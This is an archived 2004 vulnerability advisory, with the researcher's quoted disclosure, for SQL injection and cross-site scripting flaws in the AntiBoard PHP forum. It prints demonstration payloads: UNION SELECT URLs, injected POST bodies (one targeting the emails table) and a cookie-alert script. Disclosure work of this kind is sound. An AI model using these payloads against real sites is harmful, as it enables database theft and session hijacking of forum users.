SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  AntiBoard Vendors:  Tallent, Brandon
AntiBoard Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010803
SecurityTracker URL:  http://securitytracker.com/id?1010803
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 29 2004
Impact:  Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 0.7.2 and prior versions
Description:  Some input validation vulnerabilities were reported in AntiBoard. A remote user can inject SQL commands and conduct cross-site scripting attacks.

Josh Gilmour reported that several of the 'antiboard.php' functions do not properly filter user-supplied inputs. A remote user can sumibt a specially crafted HTTP request to inject SQL commands via the 'thread_id' and 'parent_id' fields.

Some demonstration exploit URLs are provided:

/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=thr eaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20w hatever--&sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

A remote user can also submit an HTTP POST request with the following parameters to inject SQL commands:

poster_name=1111&poster_email=1111&message_title=1111&message_bo dy=1111&submit=Submit%2bmessage&thread_id=3&mode=
ALL select field from antiboard_emails----&reply=reply

It is also reported that the software does not filter user-supplied input to remove HTML code before displaying the user-supplied information. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the AntiBoard software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(docu ment.cookie);</script>

The report indicates that other variables may be affected.
Impact:  A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the AntiBoard software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:  No solution was available at the time of this entry. According to the report, the vendor does not plan to issue an update.
Vendor URL:  www.resynthesize.com/code/antiboard_info.php (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Josh Gilmour <gilmourj@gmail.com>
Message History:   None.

 Source Message Contents
Date:  28 Jul 2004 18:24:50 -0000
From:  Josh Gilmour <gilmourj@gmail.com>
Subject:  AntiBoard &lt;= 0.7.2 XSS/SQL Injection

 



#######################################################################

Product:  AntiBoard
Written By:  djresonance - djresonance <at> yahoo <dot> com
Versions Affected :  <= 0.7.2
About:  AntiBoard is a small and compact multi-threaded bulletin board/message board...
Vulnerabilities:  XSS/SQL Injection
Date:  July 27, 2004
Author:  Josh Gilmour - joshg <at> conqwest <dot> com

#######################################################################

1. Introduction
2. XSS/SQL Injection Points
3. Fixes ?

#######################################################################

++++++++++++++
- Introduction
++++++++++++++

This widely used board is small and compact as stated before, great to
use for home users running a webserver and want some bulletin board
action.

>From the site:
AntiBoard is a small and compact multi-threaded bulletin board/message
board system written in PHP. It uses either MySQL or PostgreSQL as the
database backend, and has support for different languages. It is not
meant as the end all be all of bulletin boards, but rather something
to easily integrate into your own page.

I found these while just playing around with the software, I tend to
start playing around with software on freshmeat when i get bored..
(yeah i know, get a life).

Freshmeat Stats:
» Rating:  8.10/10.00 (Rank N/A)
» Vitality: 0.01% (Rank 8248)
» Popularity: 1.12% (Rank 3894)

#######################################################################

++++++++++++++
- XSS/Injection Points
++++++++++++++

There are a number of SQL points within this piece of software. Some
are harmless, others can produce tables that you may not want to have
others see...

Lets begin...

SQL Injection Points:
UNION QUERY USING GET:
============
/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&s
ort_order=
============
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%
20select%20field%20from%20whatever--
============
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&sort_
order=ASC&mode=threaded
============
antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode
=nested&reply=1
============

STORED PROCEDURE POSSIBLE:
============
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=111
1&submit=Submit%2bmessage&thread_id=3&mode=1';%20exec%20whatever--&range=&parent_
id=0&reply=reply
============

UNION QUERY USING POST:
============
POST antiboard.php poster_name=1111&poster_email=1111&message_title=1111&message_body=111
1&submit=Submit%2bmessage&thread_id=3&mode=threaded&range=&parent_id=1%20UNION
 ALL select field from antiboard_emails----&reply=reply
============
(try this one out, you may not like the results)

And i only briefly went over XSS, I'm sure its vulnerable in more places..

XSS Injection Point:
http:///antiboard.php?thread_id=1&mode=threaded&range=&feedback=&lt;script&gt;ale
rt(document.cookie);&lt;/script&gt;

######################################################################

++++++++++++++
- Fixes?
++++++++++++++

Vendor Notified: Yes (about 30 min ago)
Patch Released: No, not at the moment, and author doesnt plan to update.

dont have too much fun.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC